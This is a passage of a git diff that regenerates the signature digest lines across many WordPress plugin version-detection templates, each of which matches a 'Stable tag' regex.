4a0a0047304502202ac3e7d0a30cf79109deafb8aa48afc249be3b9ca56294bcd183878a506a82a8022100979950cdeb8b73d855b30d54b0a84e287f08c39a30a3738e456098b9152e5960:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201ce1c54e6cae2d629afe181650860a2aaba907a6b551a3d382179504bce397da022100fbf20f9df2de94c3069a7ffcd0b89896fca90335bd444e29c052bed00227fb58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index a930c6fe96..c7c0aa30fc 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100d3a26ed096968094d1198e7fd4c391c2d568981d29e07aa1636f074696bfe77b022050719b72e602467e0e9545518b49ebbd4533ec85d3681d5d69239c047f5f645a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100977bfafc745b08b3ba00349d1ffe9608cb08e427f1a840413974e6cedab3ae1a022100c12c9630ed98be12c314c371b7d81844cfca9949d6dfd8684cca80428f539a04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 4363a59c38..9d9aedb4a6 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022021bd63dac6177fb106e9c9bfebd4f553e879789ea4738bb536222607e7b5171b022044b821f2eb141c3705574b362a8ff3ba61ada2377c555d81f694d53ea0daab19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022010a5c2d0e92ee350d4b5329602e01a2cbac6d72ee02a794f59158e4d6deb8849022100b94e66a0667ded623289bdf8b405165c343325f7e376c1db26071dabb027c16d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index e5a959817d..f31613d97a 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402207518a515c600041eac5663fb821ef4aa5b7055f80049a2e143f93127a550d71602203c2711e2679ae9c645c2a3d6afbb4fa3bc17d8f381bcc7afd29b5662a714d2a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c19162345ac1f3533768f768712e25bd3ef483c8b863013b6f62ea2e59eb6ec5022100a79fe1a5fd6bcd64fffebe66d8117d4e1fd74773f5f103a0dc2998332a0bc639:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index a0c84958ed..0b06deb1db 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220133cd9f5aa75ad21d0f582395d32b12a0b599c8191147471222cc8d46c396c81022052c744dc382417be51b20785fa867ba126746b251d008509991f837204155116:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e4eb548644ccf2b02c8f2100d018fc9e01f2dc921f7a12a32550f13c2c449eae0221009a5c5e5d20891c2596fa4cfdb4c42485d9e2e1e4bae086c4f84b2ccd0cccd569:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index f48aacc200..777fa97610 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022057e87a07d284766a4ee61b59f088a996e46083d26a65ce58184cfc7355ae282602205a7016c7262e36fb27f8931b970ddbb4571be4c608a1d9eb826f4d31c5a14fcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022064641a87cb8718c67652a9ca995b72be3c041456e37602a7687563550f7bbb3a022100a2e2a9af2c279c79c9c0286596234c78c088bad6c7f232d5a75e7d992ac2a05a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 2eced50370..97f4711415 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100876f200b2575cc0cc73bdbe2aa7af0af375aa88f9acf4e2628bdfdf12b71658e022100b196d72951204d0be7bb2bb378e45932dec1752c1ca956fa948f8ab72f8f22e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207efd9e7bfb0acfa5749e28df8088f72e3e4eabc26bf38a859d68e74457f15f8902204336fd96d5ce14989b3cca07f1158a053578086c188837b63ded41ba7d1c6af5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index 122f432942..0b7114dddd 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100a0e9bbfdeca00ad17c412bd987cd5b6c2d848f00773297377c0ef5bbf7cacf01022056ba369a0f816c010fff0e9f2b878bd2f08edac5654b3eeae78b6685e56d8c40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a77a4fe4619d6c2120cf3e2d389b9e494a2325f0940f948c8783c1d8f216dc2b022100858e61049f90507663c68960fd8f69a09b350a7e0fd9a00c05c68cc48befa04c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 2cc1b20017..e868fa2188 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220710c400fc70cf154ceec777e3c37cfc27a3fe8c84d062917f304c0a26a4110eb022100976bc620f9b21facf2aab5c036a977d266680cca9fef4425f23a2604caeb46d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220038630366e097298a5d6d93b99a8af68783ca1c277bc8ce28574793198fda8d302201a570c31d2248837eed5dc23bcfc6e00f1fb2bcd18c5601194d11fe120a07aa2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 2e010f0603..a0753ef7cc 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100a81e279d6d55da391ef1fab8ff75eeb8cd85bb9a22772f93de44bdeeea9770a4022059fa44b7fcfe54187a0ac37fe023a30d1cb2b8b5a2b3bbc7ae08251c3d1b70ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009e318b1b6c0991bbd947aa871c8778b7e83cf8933fd549ffe260d3a68c7f4f6d022100cb109a50ef06b1a8d8e3d7b73dd0a3a63bb6cb589e151d947d812449297f8ec6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 2f4fe32e01..7ce9fa48b9 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022050325a0fa83f29516b3cbaa6e957ed6d1ec66ffcb2064eae8e46ca70427dd901022100c3eb31e61748a0521df6a8b46b6da6d9874d0172c34b451e7669a062118765a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204fd5e2d7c8359e1b955792e9ef8079fe659a66dc2f2e60a3273328dbbf834449022100a95944c5b6756ddfb09fdacec5592068e6279d6a844b69c1e34d6b594442b5b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 499989f054..6df357b5ca 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100edd2d9736382c0c938001f0efb4cbe644eb581150f37ece86f41771fba49bc5e022028862ad59110c714ae4c959e0965665f6b55dd91e8b2e2fbfd8ab482d8b5111c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100eff0c8732ef55f8e9c09566b4201702752455131ccf970741c2b5aa35ba092c702205d4bc96570d71343485319445008609ca287e88cf672daf7039787141d803125:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 76e0aee368..5779f6e6b1 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a0048304602210088321dfa43c6e5f6e879246d8bc65d498aa53ff1c8fe5f96e44e1f6033075847022100c2e16ad2814256160c910523705bcd3a5d7a4de68e13594f3b8b4a38d58cf8d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202b7b78fe882ca5b159e67a9cf8863cfbff4868b2fec536cbea03982d454e5498022100c23e9e74383eb07f4e83393467b1b9bcbe44fbdea5e6a2b8fda277da30e6ea48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 3a4fed2830..d720be2d04 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a004830460221008a943d647e27db13fc22e856b0343c87c881c9807a7e3ab648093cda2a698d3c022100fb26216f71f2829536a4b7d1442b78cb19f3b372057038781ee4ebde3b466eb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a418024310bb8c18e5ecec901902078b02c7233e70314525f2d11ecf0086298a0221008ebe4efc28e24170ef2dddf7e9279d82c5c0b3a4835e55ba3c702ca20f94ee52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index e796240a3a..a9c1c4d059 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220726048f4674c0acb48170ba8c7c0c2f8f8f876bc807c79bd480e8aebc2b3b7830220022c976fb70b03ba723f4cdb63ef6562b628ac9e66ca316b45d3865f5b5a9ec9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ff7ed1ad2002dfafe5888052a1e0651441fcda96056cc418a17088f57c785546022100d69e71798d195a2ad7e6ab09eeac8f58e116876cbedaf7820001dd2f6d472030:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 4ad41d6423..74768680ce 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a004830460221009a563e9866297f9f5d128b00e344f889ff8fbd57ae329eece88704e893459342022100c6f9d4d273b98ba30c05fe97f427065f0ddc14ad0c47a2f86dd5f49f0e779397:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201e246659417a58f5ba851c7d1f6b36e1a89fc7be2a5060a5f0835c8067eb372f022057bc4d0252aec95cb8e484ccc376e7ea67d1df7f9eaa0fc3970a9d078a9c8788:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 5ad35669f5..d958f30064 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100ff3210123aada26a7fa7e8e01b9bf616f10d5244821f5d2a9446696bac19bdac02207357b82ef4b932317b05d3a321c4e8abe5cc7cc58eb62efcd332f1535f561335:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022057eba472cfb34a7ef27cbfd12eb15d574c794f65fb088aacbc83999577c4ce480220679baaaff9f9dd10f0f2660fd0f71bcdd32ed5c41a99bc2f4553232caf5fd413:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index b2edcb9c35..39924b1971 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402207aa1ebf1b452bce9355c368919674b040c2ab1bc0abffc19cab935021faf21c502203d5fc5b3d686b24b676ca54bf73ea0a5d71c12c55e370d116a6e29629166ee2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ddf5b49dff3e65d3f90a098c2251eb2e416039fafcfc69c3a30ac241b16b9b39022051814849615edddfb1cfb45f87127d63f9deab3f52a9d734d815120e74716ad2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index d26da0594d..90f8e6dc1d 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100b7fc6d130cd86918aca789549d845f52a01a9f07432866d327b6d974a6c453ef022100edbce48982ca278cef9fee8cb6c4b1d714ff45c3cea32671178ede447f83f888:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203a0ea34d9ea77c178ce62205681f5053057a4255f8185e211887585d1de7e01202210090f44887df5372d8fbde5e906b6ba8377cbfccfad2e39716436845bfd80f9b2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 4a222ce9aa..d9d44aa94d 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502205eddc340416e6b6fb5d535f237ee00982e65b2402647ea09db0c47e4133f8aa7022100a551f18c508580424de35bf9577b4fad527541a0ad61bb5a3007d0f70e406c15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a46de3e0830fb9f069ab720b71332cbf034511f0ef378b9f22a467d68dd8d9d7022100d57f9ddaf49a4026da321c8f3ac34f3b50592017eef0fa7cf284732a1e7c818b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 68b5ed2178..184f2e90ae 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a004830460221008c7c8935cf74d79a4c37c2e09bd3a2f9284c6dd76d644ce42d150c24a505fbc302210092aef3c8953bef125cf8350983362a663e7b800979b41534fd0f339d608510c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ae323dd97853e1c9c2949aa721fcf29fdf5ed1d5d03a01f55412a5a0f9b15576022100b01105ef6e1c910e7428532522d5aab28a9403489a76b8cd6509ba36552e5ffd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 029ea6f11d..4e4d0fcbda 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100b77e126f8fbf7fe936eb5c340477c77da56715c98e5f92a0a5df1e80e1027b9a022026c1c71a7730566dcfd845fbde7d33d9094d3eecc67372b6c1eed4b103c5492e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c83d99a45eaf8d437d0837da77d97ba7682a8a7f5d5238f2655567e69688e81802203e16a26499d612779ca180c59d7f3d60cfee01f84369513e3383cc4c21ec1b9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index a522929c06..ec960fd849 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100c68165c7919e2f91e9a13d591679b06d90a49c760e8563bbf675a8bdda6b4cc30221009e5e3ea1e76b4d979560560b511626f53c6566f9760cae5954e0c3a0906ed3f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210096f174f76ef1bcd2da83f1b788bf470fdb862af2fdd483383796aedc98f0967c022063eff641ed92715c0d18fc05e323b59649c707e478df6b14555880e7367ccbc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 65e8c26128..0d6e5b7d79 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221008473dbeedca6a8a2b46a5f5c58d0a1625a9ceda6dfe2f789bb7846c706196c7902205ab99b59802a9bc2ea4f9a357d112caf6ae2246bc04854706d5ba9f3b174c21f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202c446df8706f6f366ec9d3b8edde887cbdc25c181986b5d23763b34e580f8c530220508b0891979e18eda07b2c51f07633a1f5c84cf6917001db10c6d402887a2b5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index ac12c86652..884b95da21 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402204e09258bbec6b88471a1fa0b48b27f36eeeaba987023e4810405142ef78c2b5302204c68b3e54759b42f493ec67c0f7d1ecad87c055ddc0aa05c97f5161fdbb7d73b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220564515ac7c87581614e3fdabc602e319761fbc735a683cc1ca070d95889f994c0221009fef17a013e5e08d51333243a80c51f969c530291d69b71f0c54ac0744e88e6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index afef7223a5..f7e315c74e 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100cafe6a8d0f79388d3e0f17e0a943c1e44a1a8dc8c332d9a504065742d64dda5c02203ff6002361af4b23c7ffa84f0c5122db66b4966bbcb93ada1f0079d987c4ba28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207dbd9e1910eaef735d94efbdcf1ded68a847e27f645189115bac7e2d05b43f01022030233cca7feaeb7b149e90677e85ef02ea2cd75fa00de0c73adafc48e94641e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 44d9a824c3..7a0ce276ea 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402202bc0330be0f0a36ccad85489d93c0b0abec962e6b974ec70f5b5b148e001e328022012f17dcf131c8d1b4d33778906445e1dcb840db20f8f356d33914a25570d3763:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202e7cd2c28440c5a0edd405e8431024a36c973e8824ef45764c75a4c7386b0a7602210088a1327e9ad26691a73c32e33af1d74d920291d37e4a5f67ec057c58e365d874:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index d7a8fd2700..1147fe3a42 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022040cbc8a126d53b12bd7560dd62ee700532b58141f2f7c3d9bad6d55511733dd3022100cdffa48c655a499a98b9dd7d86b1c932a9b3a4957cb582d688e69e1ded39d065:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008381c122bacfc0c52df612ea80c47350df6e039981fce89dec7119fef00737ed02207f0b700172502d1b41c1c6426bae73a6814963cfa29191d4bc19f048e6d1017f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index c0daff6abd..f191b9a266 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022077a69b2608be7f94696c1c5a1abf97b0b1a2ab8701bd908351918900ffd2a96402200460d7658a1ef642bbbedca751acb669f2421682b6c093ef4cc7c3744a0fdef9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022072e5aead3efbbdc44f19b5535eb200ec763a8a00cbea60261cc233e2abb03be802203104c78a61c353f1d4aa12f946f6d6390557fd2aa18136d65769b3f51541e771:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index e723294478..751cdf6db5 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502203eb09717c16b43ca209508e277227db93b619ecf0fb05a5e28ed9f1bab51fe34022100ed7a6facfb0022442d116f2f8abe14f2f6bcce2d5b9a93a22f75e06b525c8760:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207a5eb6c7f69f736da403c561a95fdd549fd00a87a73cd20c671d683dc208386002204a7c7405e169810a65673cff3826d0814f2e4ac1325f7214b78ec32041b9f32f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 5f414bdf51..7597ae14c6 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022020357c4e52d85fcf81139d70b65d3579dd294140374be326757c570a17e53b74022100f463c0ee16d9233ad1f9de565aa29bc7f8cedb6d79aa62e5b6a37b8a17a57018:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009dfa0156fae439612660c081c423c236091435c927ca0c14da32b1f2c8a1eca4022100aa36de29e76bafa20d64a909f9738504847e2e9299067a95d770abe495fd0a1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index 8aad09ee20..d96504c4e3 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100940076336c3dc85ab35b854362fc7d271a1a49bc9b1b7a6435b4d99e888ea16c02206c7ce3703a2014a2628a27dac522381bbcb7daa168a2654bfd03349e5a8657de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220103b96f4f9b25ec4a6dbd82ceb27051a0e6363727e241498f7607c6264c460fe022100c4fb18325d5e7d9f786057613a247255abea07e953f4081968bbdb1b342c0d91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index e8c40715cf..f758507515 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100b4097bc3800531cdd702a9fcbfa6067668cde22360fe8c94993a2502f8380e8802210096b71f61b9d42f63433b5773ccea9e6e9790e035eb0494ba241fbf570b4b02cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b81363bae0dac13ca46cf397fe212b47d46a6ca8770ae9194f1836b4a4ec67a7022100ca37ac607ce9598222ec7f0863982e4843fcf8f69277c377008b707fb12807e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 41b6313846..43b0100e0f 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502203d880a5cf0947aac75a0025234c9f029ea4f36df55a766f6a910716ba81de525022100acf12b738bcd96241110f2d5060c04ef5951788a83a78c0b9735926e33ef808c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ae5ea42b5afff66ef6f53eff0b251ef1e5655f4f63e087dfdc0c51afd7b1fe2a022064181a2cf4a666cbf8d97226cbde3eb3fc354ea4066abd11017527f83a9ad5ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 9bc9e341af..693673e77e 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,5 +46,4 @@ http: part: body regex: - 